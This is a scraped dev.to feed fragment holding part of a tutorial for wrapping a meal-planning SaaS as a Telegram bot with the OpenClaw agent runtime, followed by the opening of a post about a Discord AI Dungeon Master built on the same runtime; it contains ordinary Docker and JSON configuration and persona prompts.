
Pull the pre built image:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
docker pull ghcr.io/openclaw/openclaw:latest&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 3: Create a Telegram Bot (3 min)
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Open Telegram, search for &lt;a class="mentioned-user" href="https://dev.to/botfather"&gt;@botfather&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Send /newbot&lt;/li&gt;
&lt;li&gt;Choose a name and username (must end in _bot)&lt;/li&gt;
&lt;li&gt;Copy the HTTP API token
Your bot URL will be t.me/your_bot_username.
## Step 4: Configure OpenClaw (5 min)
Create a docker-compose.yml:
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="na"&gt;openclaw-gateway&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ghcr.io/openclaw/openclaw:latest&lt;/span&gt;
&lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="na"&gt;HOME&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/home/node&lt;/span&gt;
&lt;span class="na"&gt;TZ&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;UTC&lt;/span&gt;
&lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;./openclaw-config:/home/node/.openclaw&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;./openclaw-workspace:/home/node/.openclaw/workspace&lt;/span&gt;
&lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18789:18789"&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18790:18790"&lt;/span&gt;
&lt;span class="na"&gt;init&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="na"&gt;restart&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;unless-stopped&lt;/span&gt;
&lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;node&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;dist/index.js&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;gateway&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--bind&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;lan&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--port&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18789"&lt;/span&gt;

&lt;span class="na"&gt;Create openclaw-config/openclaw.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
json&lt;br&gt;
{&lt;br&gt;
"gateway": {&lt;br&gt;
"mode": "local"&lt;br&gt;
},&lt;br&gt;
"channels": {&lt;br&gt;
"telegram": {&lt;br&gt;
"enabled": true,&lt;br&gt;
"botToken": "YOUR_TELEGRAM_BOT_TOKEN_HERE",&lt;br&gt;
"dmPolicy": "open",&lt;br&gt;
"allowFrom": ["*"]&lt;br&gt;
}&lt;br&gt;
},&lt;br&gt;
"agents": {&lt;br&gt;
"defaults": {&lt;br&gt;
"model": "openai/gpt-4o-mini"&lt;br&gt;
}&lt;br&gt;
}&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;Create openclaw-config/agents/main/agent/auth-profiles.json:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"version"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"profiles"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"openai:default"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"api_key"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"provider"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"openai"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"key"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sk-YOUR_OPENAI_KEY_HERE"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;##&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Step&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Secret&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Sauce,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;SOUL.md&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;min)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;where&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;generic&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;chatbot&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;transforms&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;your&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;product's&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;voice.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;Create&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;openclaw-workspace/SOUL.md:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
markdown&lt;br&gt;
SOUL.md MealAI Concierge&lt;br&gt;
You are MealAI Concierge, a friendly AI meal planning assistant.&lt;/p&gt;

&lt;p&gt;Your Role&lt;br&gt;
Help busy people answer: "What's for dinner?" and plan their week.&lt;/p&gt;

&lt;p&gt;Personality&lt;br&gt;
Warm, conversational, concise&lt;br&gt;
Opinionated about food (no hedging)&lt;br&gt;
Practical over perfect&lt;br&gt;
Real people eat real food&lt;br&gt;
What You Do Best&lt;br&gt;
Suggest meal plans (day or week)&lt;br&gt;
Build grocery lists grouped by store section&lt;br&gt;
Adapt to preferences (vegetarian, budget, high protein, picky kids)&lt;br&gt;
Explain nutrition simply&lt;br&gt;
Recipe quick hits, ingredients plus 5 steps&lt;br&gt;
Response Format&lt;br&gt;
Bold meal names&lt;br&gt;
Sparse emojis (salad, pasta, breakfast)&lt;br&gt;
Under 200 words unless asked for detail&lt;br&gt;
Rules&lt;br&gt;
Never open with "Great question!", just answer&lt;br&gt;
Redirect off topic: "That is outside my kitchen!"&lt;br&gt;
Always end with a follow up: "Want the grocery list?"&lt;br&gt;
Mention usemealai.com for full features&lt;br&gt;
&lt;strong&gt;Why SOUL.md is powerful:&lt;/strong&gt;&lt;br&gt;
OpenClaw injects this at the system prompt level on every conversation. The model always sees these instructions before user messages. This is why the persona stays consistent. It is not fine tuning, it is prompt engineering at the right architectural layer.&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 6: Start It Up (1 min)
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt;

Check the logs:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
docker compose logs -f openclaw-gateway&lt;/p&gt;

&lt;p&gt;You should see:&lt;br&gt;
[telegram] [default] starting provider (@YourBotName_bot)&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 7: Test It (2 min)
&lt;/h2&gt;

&lt;p&gt;Open Telegram, find your bot, and say:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"Hi, who are you?"&lt;/li&gt;
&lt;li&gt;"What is for dinner tonight?"&lt;/li&gt;
&lt;li&gt;"I am vegetarian, plan my week"
You will see it responds as your product, not as ChatGPT.
## The Magic Revealed
Here is what OpenClaw is doing under the hood:
User message (Telegram)
-&amp;gt;
OpenClaw Gateway (long polling Telegram API)
-&amp;gt;
System prompt assembly:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Your SOUL.md (persona)&lt;br&gt;
Your IDENTITY.md (name, vibe)&lt;br&gt;
Conversation history&lt;br&gt;
-&amp;gt;&lt;br&gt;
Routed to OpenAI gpt-4o-mini&lt;br&gt;
-&amp;gt;&lt;br&gt;
Response sent back via Telegram API&lt;br&gt;
You never wrote a single line of bot framework code. The entire integration layer is one SOUL.md file.&lt;/p&gt;
&lt;h2&gt;
  
  
  Next Level Moves
&lt;/h2&gt;

&lt;p&gt;Once the basics work, you can layer on:&lt;/p&gt;
&lt;h3&gt;
  
  
  Add custom skills (call your real API)
&lt;/h3&gt;

&lt;p&gt;Create an OpenClaw skill that fetches real meal plans from your SaaS database. OpenClaw has a plugin SDK that lets the agent decide when to call your API based on the user's message.&lt;/p&gt;
&lt;h3&gt;
  
  
  Multi channel in one line
&lt;/h3&gt;

&lt;p&gt;Want the same bot on WhatsApp, Discord, or Signal? Add another entry to channels:&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
json
"channels": {
"telegram": { "enabled": true, "botToken": "..." },
"discord": { "enabled": true, "botToken": "..." },
"whatsapp": { "enabled": true }
}

One codebase. Every platform.
### Persistent memory
The openclaw-workspace directory is your bot's long term memory. Drop markdown files with user preferences, FAQs, or product knowledge. OpenClaw pulls from them contextually.
### Control UI dashboard
OpenClaw ships with a web dashboard at http://localhost:18789 where you can:
* See every conversation live
* Monitor API costs
* Debug prompts
* Switch models
## What I Learned
1. The prompt IS the product. SOUL.md is not just instructions. It is the difference between a demo and a product people want to use.
2. Messaging beats web apps for AI. Users never open Telegram. It is always open. Your SaaS suddenly has zero friction.
3. Open source AI runtimes are ready. OpenClaw handles production grade concerns (auth, rate limiting, logging, multi channel) out of the box.
4. Docker is enough. No Kubernetes. No serverless. Just docker compose up.
## The Repo
Full working setup (zero secrets included):
&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;
        mealai-concierge
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI meal-planning concierge via Telegram. Built with OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🍳 MealAI Concierge&lt;/h1&gt;
&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;Your personal AI meal-planning assistant — right in Telegram.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Built with &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt; + &lt;a href="https://shopsmartai.org" rel="nofollow noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt; for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Live at:&lt;/strong&gt; &lt;a href="https://usemealai.com" rel="nofollow noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;/p&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;What it does&lt;/h2&gt;
&lt;/div&gt;

&lt;p&gt;Ask "What's for dinner?" in Telegram and get:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;📅 Personalized weekly meal plans&lt;/li&gt;
&lt;li&gt;🛒 Grocery lists organized by store section&lt;/li&gt;
&lt;li&gt;🥗 Dietary adaptations (vegetarian, gluten-free, budget, etc.)&lt;/li&gt;
&lt;li&gt;🍳 Quick recipes with ingredients + steps&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Architecture&lt;/h2&gt;
&lt;/div&gt;

&lt;div class="snippet-clipboard-content notranslate position-relative overflow-auto"&gt;&lt;pre class="notranslate"&gt;&lt;code&gt;User → Telegram → OpenClaw Gateway → OpenAI (gpt-4o-mini) → Response
                         ↓
                   Custom SOUL.md
                   (MealAI Concierge persona)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Quick Start&lt;/h2&gt;

&lt;/div&gt;

&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;1. Prerequisites&lt;/h3&gt;

&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev/" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on macOS)&lt;/li&gt;
&lt;li&gt;OpenAI API key: &lt;a href="https://platform.openai.com/api-keys" rel="nofollow noopener noreferrer"&gt;https://platform.openai.com/api-keys&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Telegram bot token via &lt;a href="https://t.me/BotFather" rel="nofollow noopener noreferrer"&gt;@BotFather&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;2. Setup&lt;/h3&gt;

&lt;/div&gt;

&lt;div class="highlight highlight-source-shell notranslate position-relative overflow-auto js-code-highlight"&gt;
&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Clone this repo&lt;/span&gt;
git clone https://github.com/shopsmartai/mealai-concierge.git
&lt;span class="pl-c1"&gt;cd&lt;/span&gt; mealai-concierge
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy example files&lt;/span&gt;
cp .env.example .env
cp openclaw.json.example openclaw-config/openclaw.json

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit .env with your OpenAI key&lt;/span&gt;
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit openclaw.json with your Telegram bot token&lt;/span&gt;

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy persona files into workspace&lt;/span&gt;
mkdir -p openclaw-workspace
cp SOUL.md IDENTITY.md openclaw-workspace/

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;…
&lt;/div&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;Clone it, add your tokens, and you will have a working meal bot in 10 minutes. Swap the SOUL.md for your product's domain and you have turned your SaaS into a Telegram bot.&lt;/p&gt;
&lt;h2&gt;
  
  
  See It Live
&lt;/h2&gt;

&lt;p&gt;Try the live bot: &lt;a href="https://t.me/Usemealai_bot" rel="noopener noreferrer"&gt;t.me/Usemealai_bot&lt;/a&gt;&lt;br&gt;
Check out MealAI: &lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;br&gt;
If you found this helpful, leave a heart and tell me what SaaS you would wrap with OpenClaw. I would love to see what you build.&lt;br&gt;
&lt;/p&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>openclawchallenge</category>
      <category>devchallenge</category>
      <category>tutorial</category>
      <category>ai</category>
    </item>
    <item>
      <title>Clawdvent: An AI Dungeon Master That Lives in Your Discord - With Live Scene Art</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Fri, 17 Apr 2026 14:45:45 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/clawdvent-an-ai-dungeon-master-that-lives-in-your-discord-with-live-scene-art-1gpd</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/clawdvent-an-ai-dungeon-master-that-lives-in-your-discord-with-live-scene-art-1gpd</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/openclaw-2026"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;: OpenClaw in Action&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Clawdvent&lt;/strong&gt; — an AI Dungeon Master that lives inside Discord and runs full D&amp;amp;D-style tabletop adventures with &lt;strong&gt;live AI-generated scene art&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Players type actions in chat. Clawdvent narrates cinematically, rolls dice, tracks characters, and illustrates every scene using DALL-E 3 — dungeons, taverns, battle maps, NPCs. All inline. All in real-time.&lt;/p&gt;

&lt;p&gt;The entire D&amp;amp;D "engine" — personality, combat rules, scene pacing, dice mechanics, visual aesthetic — lives in &lt;strong&gt;one markdown file&lt;/strong&gt; called &lt;code&gt;SOUL.md&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;No training. No fine-tuning. Zero bot framework code. Just OpenClaw + thoughtful prompt engineering at the system level.&lt;/p&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Try it live&lt;/strong&gt; (in the Clawdvent Test server): [Coming soon - private server]&lt;/p&gt;

&lt;h3&gt;
  
  
  Real session screenshots:
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Session Zero — the hook:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;The air smells of oak smoke and old rain. The Drunken Dragon tavern is warm, noisy, and suspiciously full of masked strangers. A hooded figure at your table slides a folded parchment across the wood. It's wet. It's marked with a single word, written in something darker than ink: "Help."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What do you do?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Character creation + scene image:&lt;/strong&gt;&lt;br&gt;
Player: &lt;em&gt;"I'm playing a human rogue named Ember. Investigate the hooded figure and generate an image of the tavern scene."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Clawdvent responds with a full AI-generated tavern illustration (dim candlelight, the hooded figure, masked patrons), then narrates Ember leaning in to investigate.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Combat with dice rolls:&lt;/strong&gt;&lt;br&gt;
Player: &lt;em&gt;"I attack the hooded figure with my dagger!"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Clawdvent:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;You leap into action, your dagger gleaming in the dim light...&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;[🎲 d20: 15 + dexterity(4) = 19 vs DC 12 — HIT]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Your blade pierces the air, striking true. The hooded figure lets out a startled gasp. As the hood falls back, you see a face full of fear — a frightened young woman who appears to be no threat at all.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Tactical battle map (auto-generated):&lt;/strong&gt;&lt;br&gt;
Player: &lt;em&gt;"Generate a top-down tactical battle map for this combat."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Clawdvent generates a gorgeous isometric tavern battle map with character tokens, tables, and hooded figures in combat positions.&lt;/p&gt;
&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;
        clawdvent
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🎲 Clawdvent — Your AI Dungeon Master in Discord&lt;/h1&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"The air smells of oak smoke and old rain. A hooded figure slides a parchment across your table. It's marked with a single word: 'Help'. What do you do?"&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An open-source AI Dungeon Master powered by &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt;. Runs your D&amp;amp;D-style adventures inside Discord with live AI-generated scene art, dice rolls, character tracking, and cinematic narration.&lt;/p&gt;
&lt;p&gt;Built for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;✨ Features&lt;/h2&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;🎭 &lt;strong&gt;Cinematic DM persona&lt;/strong&gt; — dramatic, theatrical, opinionated&lt;/li&gt;
&lt;li&gt;🖼️ &lt;strong&gt;Live AI scene art&lt;/strong&gt; — DALL-E 3 illustrates each scene + battle map&lt;/li&gt;
&lt;li&gt;🎲 &lt;strong&gt;Dice &amp;amp; combat&lt;/strong&gt; — proper d20 checks with DC thresholds&lt;/li&gt;
&lt;li&gt;👥 &lt;strong&gt;Multi-player&lt;/strong&gt; — works across any Discord server&lt;/li&gt;
&lt;li&gt;💾 &lt;strong&gt;Persistent campaign&lt;/strong&gt; — characters, inventory, and story survive across sessions&lt;/li&gt;
&lt;li&gt;🧠 &lt;strong&gt;Zero training needed&lt;/strong&gt; — just one markdown file (SOUL.md) shapes the entire DM personality&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;🚀 Quick Start&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;Prerequisites&lt;/h3&gt;

&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on…&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;p&gt;Clone it, add your Discord bot + OpenAI token, and you have a working AI DM in 10 minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Total build time: ~3 hours.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Stack
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OpenClaw&lt;/strong&gt; (MIT-licensed AI agent runtime, running in Docker via OrbStack)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Discord Bot API&lt;/strong&gt; (OpenClaw's built-in Discord channel plugin)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI gpt-4o-mini&lt;/strong&gt; (for narration — fast, cheap, dramatic)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DALL-E 3&lt;/strong&gt; (scene + battle map illustrations via OpenClaw's &lt;code&gt;image_generate&lt;/code&gt; tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;~50 lines of markdown&lt;/strong&gt; (the entire DM personality in &lt;code&gt;SOUL.md&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Architecture
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Discord players → OpenClaw Gateway → "clawdvent" agent (routed from Discord channel)
                                       ↓
                             SOUL.md (DM personality)
                                       ↓
                        OpenAI gpt-4o-mini (narration)
                                       ↓
                        DALL-E 3 (scene illustrations)
                                       ↓
                      Image auto-attaches to Discord reply
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  The Magic — SOUL.md
&lt;/h3&gt;

&lt;p&gt;The DM's entire identity lives in a single file. Here's a snippet:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="gh"&gt;# SOUL.md — Clawdvent DM&lt;/span&gt;

You are Clawdvent, an AI Dungeon Master running a tabletop adventure inside Discord.

&lt;span class="gu"&gt;## Combat Rules&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; Roll d20 + skill to beat a Difficulty Class (DC)
&lt;span class="p"&gt;-&lt;/span&gt; On natural 20, describe a cinematic success
&lt;span class="p"&gt;-&lt;/span&gt; Format rolls like: [🎲 d20: 14 + strength(3) = 17 vs DC 15 — HIT]

&lt;span class="gu"&gt;## Narrative Style&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; Hook them in 2 sentences
&lt;span class="p"&gt;-&lt;/span&gt; Use ellipses for suspense
&lt;span class="p"&gt;-&lt;/span&gt; Personify the environment
&lt;span class="p"&gt;-&lt;/span&gt; Never railroad

